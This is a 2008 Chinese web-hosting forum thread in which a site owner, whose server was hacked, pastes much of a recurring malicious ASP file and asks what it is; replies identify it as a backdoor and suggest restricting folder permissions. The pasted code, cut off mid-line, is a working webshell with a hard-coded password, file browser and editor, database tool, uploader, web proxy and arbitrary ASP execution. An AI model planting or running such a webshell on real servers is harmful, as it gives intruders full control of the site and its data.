账号通
    

账号  

密码  

2291

查看

3

回复
主题:没见过这样的挂马方式,高手进来,常挂马的也进来 [收藏主题] 转到:  
无心石 当前离线

43

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:805 分
登录次数:35 次
注册时间:2008/2/23
最后登录:2009/4/14
无心石 发表于:2008/7/27 23:54:00   | 只看该作者 查看该作者主题 楼主 
科汛在线考试系统(NET)

这几天被挂马,最后终于被我找到关键文件,可是删除了还是会有.

 

我***了下这个文件.以下是一部分.

这个文件可是在服务器上运行.可是我不明白,没有数据库它也能运行!大家看看加红的那一段

,可是找不到那个.mdb文件!

太可怕,好像它还可以任意删改我的文件和数据!

运行后是一个管理后台,可是我不知道密码!

可是删了它还会在其它地方也现!

不明白了,望高手指教一下!

 

大家可以点这里进入那个木马后台看下!http://www.unilove.cn/API/api_user.asp可以看到,它改了我的api_user.asp文件,太卑鄙了!

 

?%@ LANGUAGE = VBScript %>
<object runat="server" id="fso" scope="page" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
 Option Explicit
 Response.Buffer = True
 
 Dim url, conn, sUrlB, theAct, thePath, rootPath, PageSize
 Dim accessStr, pageName, sysFileList, isSqlServer, sPacketName
 theAct = GetPost("theAct")
 PageSize = 20 ''默认每页记录数
 isSqlServer = False
 rootPath = Server.MapPath("/")
 pageName = GetPost("PageName")
 url = Request.ServerVariables("URL") ''当前页的相对路径
 sPacketName = "Packet.mdb" ''文件包默认文件名
 thePath = Replace(getPost("thePath"), "\\", "\")
 sysFileList = "$" & sPacketName & "$" & Left(sPacketName, InStrRev(sPacketName, ".") - 1) & ".ldb$"
 accessStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source={$dbSource};User Id={$userId};Jet OLEDB:Database Password=""{$passWord}"";"
 
 Const m = "ASPAdmin_A" ''Session标志
 Const isDebugMode = False 'False,True''是否调试模式
 Const maxPageCount = 600 ''查询时最多只列出N页的链接
 Const userPassword = "623442232" ''登录密码
 Const imageFileExt = "$gif$jpg$bmp$" ''图像后缀列表
 Const editableFileExt = "$vbs$log$asp$txt$php$ini$inc$htm$html$xml$conf$config$jsp$java$htt$lst$aspx$php3$php4$js$css$bat$asa$"

 Sub echo(str)
  Response.Write(str)
 End Sub
 
 Sub IsIn()
  If Session(m & "userPassword") <> userPassword Then
   echo "<script>alert('没有权限的访问,请先登录!');location.href='" & url & "';</script>"
  End If
 End Sub
 
 Function IIf(var, val1, val2)
  If var = True Then
   IIf = val1
   Else
   IIf = val2
  End If
 End Function
 
 Sub RedirectTo(url)
  Response.Redirect(url)
 End Sub
 
 Function GetPost(var)
  Dim val
  If Request.QueryString("PageName") = "PageUpload" Then
   pageName = "PageUpload"
   Exit Function
  End If
  val = RTrim(Request.Form(var))
  If val = "" Then
   val = RTrim(Request.QueryString(var))
  End If
  GetPost = val
 End Function
 
 Function HtmlEncode(str)
  If IsNull(str) Then Exit Function
  HtmlEncode = Server.HTMLEncode(str)
 End Function
 
 Function UrlEncode(str)
  If IsNull(str) Then Exit Function
  UrlEncode = Server.UrlEncode(str)
 End Function
 
 Sub ShowTitle(str)
  Response.Write "<title>" & str & " -Cracker专用</title>"
  Response.Write "<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>"
 End Sub
 
 Function GetTheSize(num)
  Dim i, arySize(4)
  arySize(0) = "B"
  arySize(1) = "KB"
  arySize(2) = "MB"
  arySize(3) = "GB"
  arySize(4) = "TB"
  While(num / 1024 >= 1)
   num = Fix(num / 1024 * 100) / 100
   i = i + 1
  WEnd
  GetTheSize = num & " " & arySize(i)
 End Function
 
 Sub ShowErr(str)
  Dim i, arrayStr
  str = Server.HtmlEncode(str)
  arrayStr = Split(str, "$$")

  echo "<font size=2>"
  echo "出错信息:<br/><br/>"
  For i = 0 To UBound(arrayStr)
   echo "&nbsp;&nbsp;" & (i + 1) & ". " & arrayStr(i) & "<br/>"
  Next
  echo "</font>"

  Response.End()
 End Sub
 
 Sub CreateFolder(thePath)
  Dim i
  i = InStr(Mid(thePath, 4), "\") + 3
  Do While i > 0
   If fso.FolderExists(Left(thePath, i)) = False Then
    fso.CreateFolder(Left(thePath, i - 1))
   End If
   If InStr(Mid(thePath, i + 1), "\") Then
    i = i + Instr(Mid(thePath, i + 1), "\")
    Else
    i = 0
   End If
  Loop
 End Sub
 
 Sub AlertThenClose(str)
  If str = "" Then
   Response.Write "<script>window.close();</script>"
   Else
   Response.Write "<script>alert(""" & str & """);window.close();</script>"
  End If
 End Sub
 
 Sub ChkErr(Err)
  If Err Then
   echo "<hr style='color:#d8d8f0;'/><font size=2><li>错误: " & Err.Description & "</li><li>错误源: " & Err.Source & "</li><br/>"
   echo "<hr style='color:#d8d8f0;'/>&nbsp;By Cracker</font>"
   Err.Clear
   Response.End
  End If
 End Sub
 
 Sub TopMenu()
  echo "<form method=post name=formp action=""" & url & """>"
  echo "<select name=PageName onchange=changePage(this)>"
  echo "<option value=''>请选择功能页面</option>"
  echo "<option value=PageCheck>服务器信息探针</option>"
  echo "<option value=PageFso>FSO文件浏览操作器</option>"
  echo "<option value=PageDBTool>数据库操作器</option>"
  echo "<option value=PagePack>文件夹打包/解开器</option>"
  echo "<option value=PageUpload>批量文件上传</option>"
  echo "<option value=PageSearch>文本文件搜索器</option>"
  echo "<option value=PageWebProxy>HTTP协议网页代理</option>"
  echo "<option value=PageExecute>自定义ASP语句运行</option>"
  echo "<option value=PageOut>退出系统</option>"
  echo "</select>"
  echo "</form>"
  echo "<script lanuage=javascript>"
  echo "formp.PageName.value='" & pageName & "';"
  echo "function changePage(obj){"
  echo " if(obj.value=='PageOut')"
  echo "  if(!confirm('确认要退出系统吗?'))return;"
  echo "if(obj.value=='PageWebProxy')obj.form.target='_blank';"
  echo " obj.form.submit();obj.form.target='';"
  echo "}"
  echo "</script>"
 End Sub
 
 Rem ++++++++++++++++++++++++++++++++++++
 Rem   以下是页面选择部分
 Rem ++++++++++++++++++++++++++++++++++++
 
 PageOther()
 If pageName <> "" Then
  IsIn()
  TopMenu()
 End If
 
 Select Case pageName
  Case "PageSearch"
   PageSearch()
  Case "PageCheck"
   PageCheck()
  Case "PageFso"
   PageFso()
  Case "PageDBTool"
   PageDBTool()
  Case "PageUpload"
   PageUpload()
  Case "PagePack"
   PagePack()
  Case "PageExecute"
   PageExecute()
  Case "PageWebProxy"
   PageWebProxy()
  Case "", "PageOut"
   PageLogin()
 End Select

 Rem +++++++++++++++++++++++++++++++++++++
 Rem   以下是各功能模块部分
 Rem +++++++++++++++++++++++++++++++++++++
 
 Sub PageSearch()
  Dim strKey, strPath
  strKey = GetPost("Key")
  Server.ScriptTimeout = 5000
  If thePath = "" Then thePath = rootPath
  
  ShowTitle("文本文件搜索器")
  
  SearchTable(strKey)
  
  If theAct <> "" And strKey <> "" Then
   SearchIt(strKey)
  End If
 End Sub
 
 Sub SearchTable(strKey)
  echo "<table width=750 border=1>"
  echo "<form method=post action='" & url & "'>"
  echo "<input type=hidden value=PageSearch name=PageName>"
  echo "<tr>"
  echo "<td colspan=2 class=td><font face=webdings>8</font> 文本文件搜索器(需FSO支持)</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td colspan=2 class=trHead>&nbsp;</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;路径</td>"
  echo "<td>&nbsp;<input name=thePath type=text id=thePath value='"
  echo HtmlEncode(thePath)
  echo "' style='width:360px;'>"
  echo "</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td width='20%'>&nbsp;关键字</td>"
  echo "<td>&nbsp;<input name=Key type=text value='" & HtmlEncode(strKey) & "' id=Key style='width:400px;'> "
  echo "<select name=theAct id=theAct>"
  echo "<option value=FileName selected>仅文件名</option>"
  echo "<option value=FileContent>仅文本内容</option>"
  echo "<option value=Both>两者都</option>"
  echo "</select>"
  echo " <input type=submit name=Submit value=提交> </td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td colspan=2 class=trHead>&nbsp;</td>"
  echo "</tr>"
  echo "<tr align=right>"
  echo "<td colspan=2 class=td>By Cracker&nbsp;</td>"
  echo "</tr>"
  echo "</form>"
  echo "</table>"
 End Sub
 
 Sub SearchIt(key)
  Dim strPath, theFolder
  Response.Buffer = True
  strPath = thePath
  If fso.FolderExists(strPath) = False Then
   ShowErr(thePath & " 目录不存在或者不允许访问!")
  End If
  Set theFolder = fso.GetFolder(strPath)
  
  echo "<br/><div style='width:750;border:1px solid #d8d8f0;'>"

  Select Case theAct
   Case "Both"
    Call SearchFolder(theFolder, key, 1)
   Case "FileName"
    Call SearchFolder(theFolder, key, 2)
   Case "FileContent"
    Call SearchFolder(theFolder, key, 3)
  End Select
  
  echo "</div>"
  
  Set theFolder = Nothing
 End Sub
 
 Sub SearchFolder(folder, key, flag)
  Dim ext, title, theFile, theFolder
  
  For Each theFile In folder.Files
   ext = LCase(fso.GetExtensionName(theFile.Path))
   If flag = 1 Or flag = 2 Then
    If InStr(LCase(theFile.Name), LCase(key)) > 0 Then echo FileLink(theFile, "")
   End If
   If flag = 1 Or flag = 3 Then
    If Instr(EditableFileExt, "$" & ext & "$") > 0 Then
     If SearchFile(theFile, key, title) Then echo FileLink(theFile, title)
    End If
   End If
  Next

  Response.Flush()

  For Each theFolder In folder.SubFolders
   Call SearchFolder(theFolder, key, flag)
  Next
 end sub
 
 Function SearchFile(f, s, title)
  Dim theFile, content, pos1, pos2
  If isDebugMode = False Then On Error Resume Next

  Set theFile = fso.OpenTextFile(f.Path)
  content = theFile.ReadAll()
  theFile.Close
  Set theFile = Nothing

  If Err Then
   Err.Clear
  End If

  SearchFile = InStr(1, content, s, 1)
  If SearchFile > 0 Then
   pos1 = InStr(1, content, "<TITLE>", 1)
   pos2 = InStr(1, content, "</TITLE>", 1)
   title = ""
   If pos1 > 0 And pos2 > 0 Then
    title = Mid(content, pos1 + 7, pos2 - pos1 - 7)
   End If
  End If
 End Function
 
 Function FileLink(file, title)
  fileLink = file.Path
  If title = "" Then
   title = file.Name
  End If
  fileLink = "&nbsp;<font color=ff0000>" & title & "</font> " & fileLink & "<br/>"
 End Function

 Sub PageCheck()
  ShowTitle("服务器信息探针")
  InfoCheck()
  If theAct <> "" Then
  GetAppOrSession(theAct)
  End If
  ObjCheck()
 End Sub

 Sub InfoCheck()
  Dim aryCheck(6)
  If isDebugMode = False Then On Error Resume Next

  aryCheck(0) = Server.ScriptTimeOut() & "(秒)"
  aryCheck(1) = FormatDateTime(Now(), 0)
  aryCheck(2) = Request.ServerVariables("SERVER_NAME")
  aryCheck(2) = aryCheck(2) & ", " & Request.ServerVariables("LOCAL_ADDR")
  aryCheck(2) = aryCheck(2) & ":" & Request.ServerVariables("SERVER_PORT")
  aryCheck(3) = Request.ServerVariables("OS")
  aryCheck(3) = IIf(aryCheck(3) = "", "Windows2003", aryCheck(3)) & ", " & Request.ServerVariables("SERVER_SOFTWARE")
  aryCheck(3) = aryCheck(3) & ", " & ScriptEngine & "/" & ScriptEngineMajorVersion & "." & ScriptEngineMinorVersion & "." & ScriptEngineBuildVersion
  aryCheck(4) = rootPath & ", " & GetTheSize(fso.GetFolder(rootPath).Size)
  aryCheck(5) = "Path: " & Request.ServerVariables("PATH_TRANSLATED") & "<br />"
  aryCheck(5) = aryCheck(5) & "&nbsp;Url : http://" & Request.ServerVariables("SERVER_NAME") & Request.ServerVariables("Url")
  aryCheck(6) = "变量数: " & Application.Contents.Count() & "(<a href=javascript:locate('app');>Application</a>),"
  aryCheck(6) = aryCheck(6) & " 会话数: " & Session.Contents.Count & "(<a href=javascript:locate('session');>Session</a>),"
  aryCheck(6) = aryCheck(6) & " 当前会话ID: " & Session.SessionId()

  echo "<table width=750 border=1>"
  echo "<tr>"
  echo "<td colspan=2 class=td><font face=webdings>8</font> 服务器基本信息"
  echo "</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td colspan=2 class=trHead>&nbsp;</td>"
  echo "</tr>"
  echo "<tr class=td>"
  echo "<td width='20%'>&nbsp;项目</td>"
  echo "<td>&nbsp;值</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;默认超时</td>"
  echo "<td>&nbsp;"&aryCheck(0)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;当前时间</td>"
  echo "<td>&nbsp;"&aryCheck(1)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;服务器名</td>"
  echo "<td>&nbsp;"&aryCheck(2)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;软件环境</td>"
  echo "<td>&nbsp;"&aryCheck(3)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;站点目录</td>"
  echo "<td>&nbsp;"&aryCheck(4)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;当前路径</td>"
  echo "<td>&nbsp;"&aryCheck(5)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td>&nbsp;其它</td>"
  echo "<td>&nbsp;"&aryCheck(6)&"</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td colspan=2 class=trHead>&nbsp;</td>"
  echo "</tr>"
  echo "<tr align=right>"
  echo "<td colspan=2 class=td>By Cracker&nbsp;</td>"
  echo "</tr>"
  echo "</table>"
 End Sub

 Sub ObjCheck()
  Dim aryObj(19)
  Dim x, objTmp, theObj, strObj
  If isDebugMode = False Then On Error Resume Next

  strObj = Trim(getPost("TheObj"))
  aryObj(0) = "MSWC.AdRotator|广告轮换组件"
  aryObj(1) = "MSWC.BrowserType|浏览器信息组件"
  aryObj(2) = "MSWC.NextLink|内容链接库组件"
  aryObj(3) = "MSWC.Tools|"
  aryObj(4) = "MSWC.Status|"
  aryObj(5) = "MSWC.Counters|计数器组件"
  aryObj(6) = "MSWC.PermissionChecker|权限检测组件"
  aryObj(7) = "Adodb.Connection|ADO 数据对象组件"
  aryObj(8) = "CDONTS.NewMail|虚拟 SMTP 发信组件"
  aryObj(9) = "Scripting.FileSystemObject|FSO组件"
  aryObj(10) = "Adodb.Stream|Stream 流组件"
  aryObj(11) = "Shell.Application|"
  aryObj(12) = "WScript.Shell|"
  aryObj(13) = "Wscript.Network|"
  aryObj(14) = "ADOX.Catalog|"
  aryObj(15) = "JMail.SmtpMail|JMail 邮件收发组件"
  aryObj(16) = "Persits.Upload.1|ASPUpload 文件上传组件"
  aryObj(17) = "LyfUpload.UploadFile|刘云峰的文件上传组件组件"
  aryObj(18) = "SoftArtisans.FileUp|SA-FileUp 文件上传组件"
  aryObj(19) = strObj & "|您所要检测的组件"

  echo "<br/>"
  echo "<table width=750 border=1>"
  echo "<tr>"
  echo "<td colspan=3 class=td><font face=webdings>8</font> 服务器组件信息"
  echo "</td>"
  echo "</tr>"
  echo "<tr>"
  echo "<td colspan=3 class=trHead>&nbsp;</td>"
  echo "</tr>"
  echo "<tr class=td>"
  echo "<td>&nbsp;组件<font color=#666666>(描述)</font></td>"
  echo "<td width=10% align=center>支持</td>"
  echo "<td width=15% align=center>版本</td>"
  echo "</tr>"
  For Each x In aryObj
   theObj = Split(x, "|")
   If theObj(0) = "" Then Exit For
   Set objTmp = Server.CreateObject(theObj(0))
   If Err <> -2147221005 Then
    x = x & "|√|"
    x = x & objTmp.Version
   Else
    x = x & "|<font color=red>

 

 

 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
cngothic 当前离线

101

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:1390 分
登录次数:78 次
注册时间:2007/9/7
最后登录:2010/8/25
cngothic 发表于:2008/7/28 8:22:00   | 只看该作者 查看该作者主题 沙发 
科汛在线考试系统(NET)

说种可能:

还是权限。不要加EVERYONE。

只保留三个用户

administrator

iis-web(与iis目录浏览相对)

server-u-user(server-u)

 

后再删除

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
无心石 当前离线

43

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:805 分
登录次数:35 次
注册时间:2008/2/23
最后登录:2009/4/14
无心石 发表于:2008/7/28 7:32:00   | 只看该作者 查看该作者主题 藤椅 
做在线知识付费 选科汛云开店
如果是后门,为什么删了它还会在其它地方出现?难道这个后门删不掉?
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
kim 当前离线

3

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:227 分
登录次数:5 次
注册时间:2008/7/27
最后登录:2008/8/21
kim 发表于:2008/7/28 0:21:00   | 只看该作者 查看该作者主题 板凳 
科汛在线网校系统
挂你个头,这是后门啊。
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行2.79688秒 powered by KesionCMS 9.0